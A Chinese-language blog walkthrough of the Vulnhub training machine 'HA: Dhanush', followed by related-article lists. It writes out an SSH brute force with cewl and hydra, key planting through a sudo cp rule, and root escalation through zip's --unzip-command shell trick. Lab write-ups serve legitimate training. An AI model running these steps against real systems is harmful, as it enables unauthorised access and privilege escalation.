HA: Dhanush Vulnhub Walkthrough
靶机下载连接:bash
https://www.vulnhub.com/entry/ha-dhanush,396/ssh
主机扫描:3d
主机端口扫描:blog
HTTP目录爬取ip
使用dirb dirsearch 爬取均未发现可利用的目录test
另外看到ssh端口开启了,进行网页爬取字典生成进行爆破登录
cewl http://10.10.202.147 -w dict.txtrsa
╰─ hydra -L dict.txt 10.10.202.147 ssh -s 65345 -e nsr权限
尝试复制passwd文件提示无权限,用户sarangy用户才具备cp的root权限执行下载
这里的思路:
pinak用户生成秘钥对,而后使用过cp命令复制到用户sarang用户的.ssh目录为authorized_keys文件
而后ssh -i rsa_id 进行登陆,尝试提权
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
zip命令提权
sudo zip /tmp/test.zip /home/sarang/test -T --unzip-command="sh -c /bin/bash"
OVER!
相关文章
- 1. HA: Dhanush Vulnhub Walkthrough
- 2. HA: Chakravyuh Vulnhub Walkthrough
- 3. HA: Chanakya Vulnhub Walkthrough
- 4. HA Joker Vulnhub Walkthrough
- 5. HA: ISRO Vulnhub Walkthrough
- 6. vulnhub dhanush
- 7. Sunset-Sunrise: Vulnhub Walkthrough
- 8. Sunset: dusk: Vulnhub Walkthrough
- 9. Girlfreind:1 Vulnhub Walkthrough
- 10. Happycorp:1 Vulnhub Walkthrough
- 更多相关文章...
- • OceanBase数据库入门教程 - NoSQL教程
- • PHP 运算符 - PHP教程
- • 常用的分布式事务解决方案
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. HA: Dhanush Vulnhub Walkthrough
- 2. HA: Chakravyuh Vulnhub Walkthrough
- 3. HA: Chanakya Vulnhub Walkthrough
- 4. HA Joker Vulnhub Walkthrough
- 5. HA: ISRO Vulnhub Walkthrough
- 6. vulnhub dhanush
- 7. Sunset-Sunrise: Vulnhub Walkthrough
- 8. Sunset: dusk: Vulnhub Walkthrough
- 9. Girlfreind:1 Vulnhub Walkthrough
- 10. Happycorp:1 Vulnhub Walkthrough